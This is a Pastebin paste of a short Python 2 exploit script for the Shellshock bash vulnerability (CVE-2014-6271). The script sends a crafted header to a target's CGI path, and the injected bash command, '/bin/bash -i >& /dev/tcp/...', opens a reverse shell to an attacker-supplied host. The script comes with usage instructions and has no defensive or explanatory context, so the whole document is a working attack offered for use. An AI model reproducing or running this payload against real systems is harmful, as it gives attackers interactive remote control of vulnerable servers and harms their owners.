opexxx

CVE-2014-6271.py

Oct 7th, 2014
362
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.60 KB | None | 0 0
  1. #
  2. #CVE-2014-6271 cgi-bin reverse shell
  3. #
  4.  
  5. import httplib,urllib,sys
  6.  
  7. if (len(sys.argv)<4):
  8.     print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
  9.     print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
  10.     exit(0)
  11.  
  12. conn = httplib.HTTPConnection(sys.argv[1])
  13. reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
  14.  
  15. headers = {"Content-type": "application/x-www-form-urlencoded",
  16.     "test":reverse_shell }
  17. conn.request("GET",sys.argv[2],headers=headers)
  18. res = conn.getresponse()
  19. print res.status, res.reason
  20. data = res.read()
  21. print data
Add Comment
Please, Sign In to add comment